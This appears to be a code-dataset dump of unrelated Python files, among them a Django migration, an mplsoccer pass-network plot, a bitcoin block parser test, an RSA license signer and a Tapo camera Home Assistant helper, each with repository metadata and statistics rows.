@author: Neal LONG
Try to construct URL with string.format
"""
base_url = "http://quotes.money.163.com/service/gszl_{:>06}.html?type={}"
stock = "000002"
api_type = 'cp'
print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type)
print(base_url.format(stock,api_type))
print('='*40)
stock = "00002"
print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type)
print(base_url.format(stock,api_type))
print('='*40)
print('='*40)
print('{:>6}'.format('236'))
print('{:>06}'.format('236'))
print("Every {} should know the use of {}-{} programming and {}"
.format("programmer", "Open", "Source", "Operating Systems"))
print("Every {3} should know the use of {2}-{1} programming and {0}"
.format("programmer", "Open", "Source", "Operating Systems")) | 27 | 80 | 0.623094 | 129 | 918 | 4.348837 | 0.457364 | 0.062389 | 0.085562 | 0.096257 | 0.606061 | 0.541889 | 0.392157 | 0.335116 | 0.335116 | 0.335116 | 0 | 0.070039 | 0.160131 | 918 | 34 | 81 | 27 | 0.657588 | 0.12963 | 0 | 0.529412 | 0 | 0 | 0.509881 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.647059 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
4c545b9b4e257d67ea1869f9e75cf7e1b7bca4c8 | 613 | py | Python | backend/app/migrations/0021_auto_20201205_1846.py | mareknowak98/AuctionPortal | 0059fec07d51c6942b8af73cb8c4f9962c21fc97 | [
"MIT"
] | null | null | null | backend/app/migrations/0021_auto_20201205_1846.py | mareknowak98/AuctionPortal | 0059fec07d51c6942b8af73cb8c4f9962c21fc97 | [
"MIT"
] | null | null | null | backend/app/migrations/0021_auto_20201205_1846.py | mareknowak98/AuctionPortal | 0059fec07d51c6942b8af73cb8c4f9962c21fc97 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.4 on 2020-12-05 18:46
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0020_auto_20201204_2324'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='profileBankAccountNr',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='profile',
name='profileTelephoneNumber',
field=models.CharField(blank=True, max_length=15, null=True),
),
]
| 25.541667 | 73 | 0.60522 | 63 | 613 | 5.777778 | 0.650794 | 0.10989 | 0.137363 | 0.159341 | 0.428571 | 0.428571 | 0.208791 | 0 | 0 | 0 | 0 | 0.079365 | 0.280587 | 613 | 23 | 74 | 26.652174 | 0.746032 | 0.073409 | 0 | 0.352941 | 1 | 0 | 0.144876 | 0.079505 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.058824 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4c55251ed58f769e9fbe55114b14a016770952cb | 1,075 | py | Python | libcity/executor/map_matching_executor.py | nadiaaaaachen/Bigscity-LibCity | d8efd38fcc238e3ba518c559cc9f65b49efaaf71 | [
"Apache-2.0"
] | 1 | 2021-11-22T12:22:32.000Z | 2021-11-22T12:22:32.000Z | libcity/executor/map_matching_executor.py | yuanhaitao/Bigscity-LibCity | 9670c6a2f26043bb8d9cc1715780bb599cce2cd5 | [
"Apache-2.0"
] | null | null | null | libcity/executor/map_matching_executor.py | yuanhaitao/Bigscity-LibCity | 9670c6a2f26043bb8d9cc1715780bb599cce2cd5 | [
"Apache-2.0"
] | null | null | null | from logging import getLogger
from libcity.executor.abstract_tradition_executor import AbstractTraditionExecutor
from libcity.utils import get_evaluator
class MapMatchingExecutor(AbstractTraditionExecutor):
def __init__(self, config, model):
self.model = model
self.config = config
self.evaluator = get_evaluator(config)
self.evaluate_res_dir = './libcity/cache/evaluate_cache'
self._logger = getLogger()
def evaluate(self, test_data):
"""
use model to test data
Args:
test_data
"""
result = self.model.run(test_data)
batch = {'route': test_data['route'], 'result': result, 'rd_nwk': test_data['rd_nwk']}
self.evaluator.collect(batch)
self.evaluator.save_result(self.evaluate_res_dir)
def train(self, train_dataloader, eval_dataloader):
"""
对于传统模型,不需要训练
Args:
train_dataloader(torch.Dataloader): Dataloader
eval_dataloader(torch.Dataloader): Dataloader
"""
pass # do nothing
| 29.861111 | 94 | 0.652093 | 115 | 1,075 | 5.869565 | 0.4 | 0.071111 | 0.044444 | 0.053333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.254884 | 1,075 | 35 | 95 | 30.714286 | 0.842697 | 0.163721 | 0 | 0 | 0 | 0 | 0.071429 | 0.036946 | 0 | 0 | 0 | 0 | 0 | 1 | 0.176471 | false | 0.058824 | 0.176471 | 0 | 0.411765 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4c55a30419a518ea1054e9871ae5c2c7cf5db9f5 | 307 | py | Python | project1/budget/migrations/0005_delete_hiddenstatus_budget.py | sujeethiremath/Project-1 | 7f0bff66287d479e231e123615f2df18f9107178 | [
"MIT"
] | null | null | null | project1/budget/migrations/0005_delete_hiddenstatus_budget.py | sujeethiremath/Project-1 | 7f0bff66287d479e231e123615f2df18f9107178 | [
"MIT"
] | null | null | null | project1/budget/migrations/0005_delete_hiddenstatus_budget.py | sujeethiremath/Project-1 | 7f0bff66287d479e231e123615f2df18f9107178 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.5 on 2020-04-08 00:08
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('budget', '0004_auto_20200407_2356'),
]
operations = [
migrations.DeleteModel(
name='HiddenStatus_Budget',
),
]
| 18.058824 | 47 | 0.618893 | 33 | 307 | 5.636364 | 0.787879 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.139013 | 0.273616 | 307 | 16 | 48 | 19.1875 | 0.695067 | 0.14658 | 0 | 0 | 1 | 0 | 0.184615 | 0.088462 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4c5b0cb42835f92d5cfa623b7b0648900462ba33 | 1,069 | py | Python | examples/simpleWiki.py | klahnakoski/mo-parsing | 885bf3fd61430d5fa15164168b975b18988fcf9e | [
"MIT"
] | 1 | 2021-10-30T21:18:29.000Z | 2021-10-30T21:18:29.000Z | examples/simpleWiki.py | klahnakoski/mo-parsing | 885bf3fd61430d5fa15164168b975b18988fcf9e | [
"MIT"
] | 22 | 2020-04-15T14:49:30.000Z | 2021-12-22T02:49:52.000Z | examples/simpleWiki.py | klahnakoski/mo-parsing | 885bf3fd61430d5fa15164168b975b18988fcf9e | [
"MIT"
] | null | null | null | from mo_parsing.helpers import QuotedString
wikiInput = """
Here is a simple Wiki input:
*This is in italics.*
**This is in bold!**
***This is in bold italics!***
Here's a URL to {{Pyparsing's Wiki Page->https://site-closed.wikispaces.com}}
"""
def convertToHTML(opening, closing):
def conversionParseAction(t, l, s):
return opening + t[0] + closing
return conversionParseAction
italicized = QuotedString("*").add_parse_action(convertToHTML("<I>", "</I>"))
bolded = QuotedString("**").add_parse_action(convertToHTML("<B>", "</B>"))
boldItalicized = QuotedString("***").add_parse_action(convertToHTML("<B><I>", "</I></B>"))
def convertToHTML_A(t, l, s):
try:
text, url = t[0].split("->")
except ValueError:
raise ParseFatalException(s, l, "invalid URL link reference: " + t[0])
return '<A href="{}">{}</A>'.format(url, text)
urlRef = QuotedString("{{", end_quote_char="}}").add_parse_action(convertToHTML_A)
wikiMarkup = urlRef | boldItalicized | bolded | italicized
| 28.131579 | 91 | 0.635173 | 128 | 1,069 | 5.203125 | 0.476563 | 0.048048 | 0.084084 | 0.162162 | 0.178679 | 0.12012 | 0 | 0 | 0 | 0 | 0 | 0.00346 | 0.188962 | 1,069 | 37 | 92 | 28.891892 | 0.764706 | 0 | 0 | 0 | 0 | 0.043478 | 0.269193 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.130435 | false | 0 | 0.043478 | 0.043478 | 0.304348 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4c5e8dbae6d19592874e45bede3206b69cd9c042 | 594 | py | Python | genlicense.py | d53dave/python-crypto-licensecheck | d11612612ea54a5418fd8dbba9212a9c84c56f22 | [
"CNRI-Python",
"RSA-MD"
] | null | null | null | genlicense.py | d53dave/python-crypto-licensecheck | d11612612ea54a5418fd8dbba9212a9c84c56f22 | [
"CNRI-Python",
"RSA-MD"
] | null | null | null | genlicense.py | d53dave/python-crypto-licensecheck | d11612612ea54a5418fd8dbba9212a9c84c56f22 | [
"CNRI-Python",
"RSA-MD"
] | null | null | null | import sys
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256
from Crypto.PublicKey import RSA
def sign_data(key, data, output_file):
with open(key, 'r', encoding='utf-8') as keyFile:
rsakey = RSA.importKey(keyFile.read())
signer = pkcs1_15.new(rsakey)
digest = SHA256.new(data.encode('utf-8'))
with open(output_file, 'wb') as out:
out.write(signer.sign(digest))
if __name__ == '__main__':
key_file = sys.argv[1]
input_string = sys.argv[2]
out_file = sys.argv[3]
sign_data(key_file, input_string, out_file)
| 28.285714 | 53 | 0.66835 | 89 | 594 | 4.235955 | 0.494382 | 0.079576 | 0.058355 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03617 | 0.208754 | 594 | 20 | 54 | 29.7 | 0.765957 | 0 | 0 | 0 | 0 | 0 | 0.035354 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.3125 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
4c61ecd42ed59f6a2c7fd49a38719e52edaf2a1f | 845 | py | Python | orion/modules/active/wolfram.py | isathish/ai_opesource | cdccd882306c45712fcdd40e15937b5a9571028a | [
"MIT"
] | null | null | null | orion/modules/active/wolfram.py | isathish/ai_opesource | cdccd882306c45712fcdd40e15937b5a9571028a | [
"MIT"
] | null | null | null | orion/modules/active/wolfram.py | isathish/ai_opesource | cdccd882306c45712fcdd40e15937b5a9571028a | [
"MIT"
] | null | null | null | """
Handles most general questions (including math!)
Requires:
- WolframAlpha API key
Usage Examples:
- "How tall is Mount Everest?"
- "What is the derivative of y = 2x?"
"""
import wolframalpha
from orion.classes.module import Module
from orion.classes.task import ActiveTask
from orion import settings
wolfram_client = wolframalpha.Client(settings.WOLFRAM_KEY)
class AnswerTask(ActiveTask):
def match(self, text):
return True
def action(self, text):
try:
query = wolfram_client.query(text)
self.speak(next(query.results).text)
except:
self.speak(settings.NO_MODULES)
class Wolfram(Module):
def __init__(self):
tasks = [AnswerTask()]
super(Wolfram, self).__init__('wolfram', tasks, priority=0)
| 21.666667 | 68 | 0.639053 | 96 | 845 | 5.5 | 0.572917 | 0.051136 | 0.060606 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003226 | 0.266272 | 845 | 38 | 69 | 22.236842 | 0.848387 | 0.213018 | 0 | 0 | 0 | 0 | 0.011309 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.222222 | 0.055556 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
4c66a4345821de6dcbba5bb0bbb633c3ee79daa3 | 2,219 | py | Python | tools/Bitcoin Parser/blockchain_parser/tests/test_block.py | simewu/bitcoin_researcher | b9fd2efdb8ae8467c5bd4b3320713a541635df16 | [
"MIT"
] | 1 | 2020-02-15T21:44:04.000Z | 2020-02-15T21:44:04.000Z | tools/Bitcoin Parser/blockchain_parser/tests/test_block.py | SimeoW/bitcoin | 3644405f06c8b16a437513e8c02f0f061b91be2e | [
"MIT"
] | null | null | null | tools/Bitcoin Parser/blockchain_parser/tests/test_block.py | SimeoW/bitcoin | 3644405f06c8b16a437513e8c02f0f061b91be2e | [
"MIT"
] | null | null | null | # Copyright (C) 2015-2016 The bitcoin-blockchain-parser developers
#
# This file is part of bitcoin-blockchain-parser.
#
# It is subject to the license terms in the LICENSE file found in the top-level
# directory of this distribution.
#
# No part of bitcoin-blockchain-parser, including this file, may be copied,
# modified, propagated, or distributed except according to the terms contained
# in the LICENSE file.
import unittest
from datetime import datetime
from .utils import read_test_data
from blockchain_parser.block import Block
class TestBlock(unittest.TestCase):
def test_from_hex(self):
block_hex = read_test_data("genesis_block.txt")
block = Block.from_hex(block_hex)
self.assertEqual(1, block.n_transactions)
block_hash = "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1" \
"b60a8ce26f"
self.assertEqual(block_hash, block.hash)
self.assertEqual(486604799, block.header.bits)
merkle_root = "4a5e1e4baab89f3a32518a88c31bc87f618f76673e2cc77ab2127" \
"b7afdeda33b"
self.assertEqual(merkle_root, block.header.merkle_root)
self.assertEqual(2083236893, block.header.nonce)
self.assertEqual(1, block.header.version)
self.assertEqual(1, block.header.difficulty)
self.assertEqual(285, block.size)
self.assertEqual(datetime.utcfromtimestamp(1231006505),
block.header.timestamp)
self.assertEqual("0" * 64, block.header.previous_block_hash)
for tx in block.transactions:
self.assertEqual(1, tx.version)
tx_hash = "4a5e1e4baab89f3a32518a88c31bc87f618f76673e2cc77ab2127" \
"b7afdeda33b"
self.assertEqual(tx_hash, tx.hash)
self.assertEqual(204, tx.size)
self.assertEqual(0, tx.locktime)
self.assertEqual(0xffffffff, tx.inputs[0].transaction_index)
self.assertEqual(0xffffffff, tx.inputs[0].sequence_number)
self.assertTrue("ffff001d" in tx.inputs[0].script.value)
self.assertEqual("0" * 64, tx.inputs[0].transaction_hash)
self.assertEqual(50 * 100000000, tx.outputs[0].value)
| 43.509804 | 79 | 0.68995 | 250 | 2,219 | 6.028 | 0.388 | 0.179164 | 0.042468 | 0.041805 | 0.119443 | 0.045123 | 0 | 0 | 0 | 0 | 0 | 0.111175 | 0.221722 | 2,219 | 50 | 80 | 44.38 | 0.761436 | 0.177557 | 0 | 0.057143 | 0 | 0 | 0.120728 | 0.088203 | 0 | 0 | 0.011025 | 0 | 0.542857 | 1 | 0.028571 | false | 0 | 0.114286 | 0 | 0.171429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4c6c5b767e3d2e7d380bed49701614a213de873b | 8,063 | py | Python | examples/plots/plot_pass_network.py | DymondFormation/mplsoccer | 544300857ec5936781e12fda203cf2df8a3d00b9 | [
"MIT"
] | null | null | null | examples/plots/plot_pass_network.py | DymondFormation/mplsoccer | 544300857ec5936781e12fda203cf2df8a3d00b9 | [
"MIT"
] | null | null | null | examples/plots/plot_pass_network.py | DymondFormation/mplsoccer | 544300857ec5936781e12fda203cf2df8a3d00b9 | [
"MIT"
] | null | null | null | """
============
Pass Network
============
This example shows how to plot passes between players in a set formation.
"""
import pandas as pd
from mplsoccer.pitch import Pitch
from matplotlib.colors import to_rgba
import numpy as np
from mplsoccer.statsbomb import read_event, EVENT_SLUG
##############################################################################
# Set team and match info, and get event and tactics dataframes for the defined match_id
match_id = 15946
team = 'Barcelona'
opponent = 'Alavés (A), 2018/19 La Liga'
event_dict = read_event(f'{EVENT_SLUG}/{match_id}.json', warn=False)
players = event_dict['tactics_lineup']
events = event_dict['event']
##############################################################################
# Adding on the last tactics id and formation for the team for each event
events.loc[events.tactics_formation.notnull(), 'tactics_id'] = events.loc[
events.tactics_formation.notnull(), 'id']
events[['tactics_id', 'tactics_formation']] = events.groupby('team_name')[[
'tactics_id', 'tactics_formation']].ffill()
##############################################################################
# Add the abbreviated player position to the players dataframe
formation_dict = {1: 'GK', 2: 'RB', 3: 'RCB', 4: 'CB', 5: 'LCB', 6: 'LB', 7: 'RWB',
8: 'LWB', 9: 'RDM', 10: 'CDM', 11: 'LDM', 12: 'RM', 13: 'RCM',
14: 'CM', 15: 'LCM', 16: 'LM', 17: 'RW', 18: 'RAM', 19: 'CAM',
20: 'LAM', 21: 'LW', 22: 'RCF', 23: 'ST', 24: 'LCF', 25: 'SS'}
players['position_abbreviation'] = players.player_position_id.map(formation_dict)
##############################################################################
# Add on the subsitutions to the players dataframe, i.e. where players are subbed on
# but the formation doesn't change
sub = events.loc[events.type_name == 'Substitution',
['tactics_id', 'player_id', 'substitution_replacement_id',
'substitution_replacement_name']]
players_sub = players.merge(sub.rename({'tactics_id': 'id'}, axis='columns'),
on=['id', 'player_id'], how='inner', validate='1:1')
players_sub = (players_sub[['id', 'substitution_replacement_id', 'position_abbreviation']]
.rename({'substitution_replacement_id': 'player_id'}, axis='columns'))
players = pd.concat([players, players_sub])
players.rename({'id': 'tactics_id'}, axis='columns', inplace=True)
players = players[['tactics_id', 'player_id', 'position_abbreviation']]
##############################################################################
# Add player position information to the events dataframe
# add on the position the player was playing in the formation to the events dataframe
events = events.merge(players, on=['tactics_id', 'player_id'], how='left', validate='m:1')
# add on the position the receipient was playing in the formation to the events dataframe
events = events.merge(players.rename({'player_id': 'pass_recipient_id'},
axis='columns'), on=['tactics_id', 'pass_recipient_id'],
how='left', validate='m:1', suffixes=['', '_receipt'])
##############################################################################
# Create dataframes for passes and player locations
# get a dataframe with all passes
mask_pass = (events.team_name == team) & (events.type_name == 'Pass')
to_keep = ['id', 'match_id', 'player_id', 'player_name', 'outcome_name', 'pass_recipient_id',
'pass_recipient_name', 'x', 'y', 'end_x', 'end_y', 'tactics_id', 'tactics_formation',
'position_abbreviation', 'position_abbreviation_receipt']
passes = events.loc[mask_pass, to_keep].copy()
print('Formations used by {} in match: '.format(team), passes['tactics_formation'].unique())
##############################################################################
# Filter passes by chosen formation, then group all passes and receipts to
# calculate avg x, avg y, count of events for each slot in the formation
formation = 433
passes_formation = passes[(passes.tactics_formation == formation) &
(passes.position_abbreviation_receipt.notnull())].copy()
passer_passes = passes_formation[['position_abbreviation', 'x', 'y']].copy()
recipient_passes = passes_formation[['position_abbreviation_receipt', 'end_x', 'end_y']].copy()
# rename columns to match those in passer_passes
recipient_passes.rename({'position_abbreviation_receipt': 'position_abbreviation',
'end_x': 'x', 'end_y': 'y'}, axis='columns', inplace=True)
# create a new dataframe containing all individual passes and receipts from passes_formation
appended_passes = pd.concat(objs=[passer_passes, recipient_passes], ignore_index=True)
average_locs_and_count = appended_passes.groupby('position_abbreviation').agg({
'x': ['mean'], 'y': ['mean', 'count']})
average_locs_and_count.columns = ['x', 'y', 'count']
##############################################################################
# Group the passes by unique pairings of players and add the avg player positions to this dataframe
# calculate the number of passes between each position (using min/ max so we get passes both ways)
passes_formation['pos_max'] = passes_formation[['position_abbreviation',
'position_abbreviation_receipt']].max(axis='columns')
passes_formation['pos_min'] = passes_formation[['position_abbreviation',
'position_abbreviation_receipt']].min(axis='columns')
passes_between = passes_formation.groupby(['pos_min', 'pos_max']).id.count().reset_index()
passes_between.rename({'id': 'pass_count'}, axis='columns', inplace=True)
# add on the location of each player so we have the start and end positions of the lines
passes_between = passes_between.merge(average_locs_and_count, left_on='pos_min', right_index=True)
passes_between = passes_between.merge(average_locs_and_count, left_on='pos_max', right_index=True,
suffixes=['', '_end'])
##############################################################################
# Calculate the line width and marker sizes relative to the largest counts
max_line_width = 18
max_marker_size = 3000
passes_between['width'] = passes_between.pass_count / passes_between.pass_count.max() * max_line_width
average_locs_and_count['marker_size'] = (average_locs_and_count['count']
/ average_locs_and_count['count'].max() * max_marker_size)
##############################################################################
# Set color to make the lines more transparent when fewer passes are made
min_transparency = 0.3
color = np.array(to_rgba('white'))
color = np.tile(color, (len(passes_between), 1))
c_transparency = passes_between.pass_count / passes_between.pass_count.max()
c_transparency = (c_transparency * (1 - min_transparency)) + min_transparency
color[:, 3] = c_transparency
##############################################################################
# Plotting
pitch = Pitch(pitch_type='statsbomb', orientation='horizontal',
pitch_color='#22312b', line_color='#c7d5cc', figsize=(16, 11),
constrained_layout=True, tight_layout=False)
fig, ax = pitch.draw()
pass_lines = pitch.lines(passes_between.x, passes_between.y,
passes_between.x_end, passes_between.y_end, lw=passes_between.width,
color=color, zorder=1, ax=ax)
pass_nodes = pitch.scatter(average_locs_and_count.x, average_locs_and_count.y, s=average_locs_and_count.marker_size,
color='red', edgecolors='black', linewidth=1, alpha=1, ax=ax)
for index, row in average_locs_and_count.iterrows():
pitch.annotate(row.name, xy=(row.x, row.y), c='white', va='center', ha='center', size=16, weight='bold', ax=ax)
title = ax.set_title("{} {} Formation vs {}".format(team, formation, opponent), size=28, y=0.97, color='#c7d5cc')
fig.set_facecolor("#22312b")
| 55.226027 | 116 | 0.615032 | 976 | 8,063 | 4.862705 | 0.276639 | 0.052044 | 0.032448 | 0.044037 | 0.187948 | 0.147493 | 0.099452 | 0.073325 | 0.073325 | 0.053519 | 0 | 0.014395 | 0.155649 | 8,063 | 145 | 117 | 55.606897 | 0.682726 | 0.183306 | 0 | 0 | 0 | 0 | 0.23193 | 0.082807 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.309524 | 0.059524 | 0 | 0.059524 | 0.011905 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4c72f9ae2886173a745e73873beb49821cbc3a3f | 691 | py | Python | streetlite/common/constants.py | s0h3ck/streetlite | 21db388702f828417dd3dc0fbfa5af757216e1e0 | [
"MIT"
] | null | null | null | streetlite/common/constants.py | s0h3ck/streetlite | 21db388702f828417dd3dc0fbfa5af757216e1e0 | [
"MIT"
] | 1 | 2021-06-01T22:23:13.000Z | 2021-06-01T22:23:13.000Z | streetlite/common/constants.py | s0h3ck/streetlite | 21db388702f828417dd3dc0fbfa5af757216e1e0 | [
"MIT"
] | null | null | null | from enum import Enum
class CustomEnum(Enum):
@classmethod
def has_value(cls, value):
return any(value == item.value for item in cls)
@classmethod
def from_value(cls, value):
found_element = None
if cls.has_value(value):
found_element = cls(value)
return found_element
class Direction(CustomEnum):
EAST = 0x1
SOUTH = 0x2
WEST = 0x3
NORTH = 0x4
class Action(CustomEnum):
FLASH_RED = 0x32
GREEN = 0x33
FLASH_GREEN = 0x34
PEDESTRIAN = 0x35
EMERGENCY = 0x37
class Intersection(CustomEnum):
A = 0x62
B = 0x61
BOTH = 0x63
class Mode(CustomEnum):
LIVE = 0
SIMULATION = 1 | 18.675676 | 55 | 0.622287 | 85 | 691 | 4.964706 | 0.6 | 0.056872 | 0.061611 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.070539 | 0.30246 | 691 | 37 | 56 | 18.675676 | 0.804979 | 0 | 0 | 0.068966 | 0 | 0 | 0 | 0 | 0 | 0 | 0.063584 | 0 | 0 | 1 | 0.068966 | false | 0 | 0.034483 | 0.034483 | 0.827586 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
4c79ab828e049f734329ac9fd7817c526a06676d | 6,777 | py | Python | custom_components/tapo_control/utils.py | david-kalbermatten/HomeAssistant-Tapo-Control | 3f9f8316cf7e176bb6f8d798d709f3c6d346a527 | [
"Apache-2.0"
] | null | null | null | custom_components/tapo_control/utils.py | david-kalbermatten/HomeAssistant-Tapo-Control | 3f9f8316cf7e176bb6f8d798d709f3c6d346a527 | [
"Apache-2.0"
] | null | null | null | custom_components/tapo_control/utils.py | david-kalbermatten/HomeAssistant-Tapo-Control | 3f9f8316cf7e176bb6f8d798d709f3c6d346a527 | [
"Apache-2.0"
] | null | null | null | import onvif
import os
import asyncio
import urllib.parse
from onvif import ONVIFCamera
from pytapo import Tapo
from .const import ENABLE_MOTION_SENSOR, DOMAIN, LOGGER, CLOUD_PASSWORD
from homeassistant.const import CONF_IP_ADDRESS, CONF_USERNAME, CONF_PASSWORD
from homeassistant.components.onvif.event import EventManager
from homeassistant.components.ffmpeg import DATA_FFMPEG
from haffmpeg.tools import IMAGE_JPEG, ImageFrame
def registerController(host, username, password):
return Tapo(host, username, password)
async def isRtspStreamWorking(hass, host, username, password):
_ffmpeg = hass.data[DATA_FFMPEG]
ffmpeg = ImageFrame(_ffmpeg.binary, loop=hass.loop)
username = urllib.parse.quote_plus(username)
password = urllib.parse.quote_plus(password)
streaming_url = f"rtsp://{username}:{password}@{host}:554/stream1"
image = await asyncio.shield(
ffmpeg.get_image(
streaming_url,
output_format=IMAGE_JPEG,
)
)
return not image == b""
async def initOnvifEvents(hass, host, username, password):
device = ONVIFCamera(
host,
2020,
username,
password,
f"{os.path.dirname(onvif.__file__)}/wsdl/",
no_cache=True,
)
try:
await device.update_xaddrs()
device_mgmt = device.create_devicemgmt_service()
device_info = await device_mgmt.GetDeviceInformation()
if "Manufacturer" not in device_info:
raise Exception("Onvif connection has failed.")
return device
except Exception:
pass
return False
async def getCamData(hass, controller):
camData = {}
presets = await hass.async_add_executor_job(controller.isSupportingPresets)
camData["user"] = controller.user
camData["basic_info"] = await hass.async_add_executor_job(controller.getBasicInfo)
camData["basic_info"] = camData["basic_info"]["device_info"]["basic_info"]
try:
motionDetectionData = await hass.async_add_executor_job(
controller.getMotionDetection
)
motion_detection_enabled = motionDetectionData["enabled"]
if motionDetectionData["digital_sensitivity"] == "20":
motion_detection_sensitivity = "low"
elif motionDetectionData["digital_sensitivity"] == "50":
motion_detection_sensitivity = "normal"
elif motionDetectionData["digital_sensitivity"] == "80":
motion_detection_sensitivity = "high"
else:
motion_detection_sensitivity = None
except Exception:
motion_detection_enabled = None
motion_detection_sensitivity = None
camData["motion_detection_enabled"] = motion_detection_enabled
camData["motion_detection_sensitivity"] = motion_detection_sensitivity
try:
privacy_mode = await hass.async_add_executor_job(controller.getPrivacyMode)
privacy_mode = privacy_mode["enabled"]
except Exception:
privacy_mode = None
camData["privacy_mode"] = privacy_mode
try:
alarmData = await hass.async_add_executor_job(controller.getAlarm)
alarm = alarmData["enabled"]
alarm_mode = alarmData["alarm_mode"]
except Exception:
alarm = None
alarm_mode = None
camData["alarm"] = alarm
camData["alarm_mode"] = alarm_mode
try:
commonImageData = await hass.async_add_executor_job(controller.getCommonImage)
day_night_mode = commonImageData["image"]["common"]["inf_type"]
except Exception:
day_night_mode = None
camData["day_night_mode"] = day_night_mode
try:
led = await hass.async_add_executor_job(controller.getLED)
led = led["enabled"]
except Exception:
led = None
camData["led"] = led
try:
auto_track = await hass.async_add_executor_job(controller.getAutoTrackTarget)
auto_track = auto_track["enabled"]
except Exception:
auto_track = None
camData["auto_track"] = auto_track
if presets:
camData["presets"] = presets
else:
camData["presets"] = {}
return camData
async def update_listener(hass, entry):
"""Handle options update."""
host = entry.data.get(CONF_IP_ADDRESS)
username = entry.data.get(CONF_USERNAME)
password = entry.data.get(CONF_PASSWORD)
motionSensor = entry.data.get(ENABLE_MOTION_SENSOR)
cloud_password = entry.data.get(CLOUD_PASSWORD)
try:
if cloud_password != "":
tapoController = await hass.async_add_executor_job(
registerController, host, "admin", cloud_password
)
else:
tapoController = await hass.async_add_executor_job(
registerController, host, username, password
)
hass.data[DOMAIN][entry.entry_id]["controller"] = tapoController
except Exception:
LOGGER.error(
"Authentication to Tapo camera failed."
+ " Please restart the camera and try again."
)
for entity in hass.data[DOMAIN][entry.entry_id]["entities"]:
entity._host = host
entity._username = username
entity._password = password
if hass.data[DOMAIN][entry.entry_id]["events"]:
await hass.data[DOMAIN][entry.entry_id]["events"].async_stop()
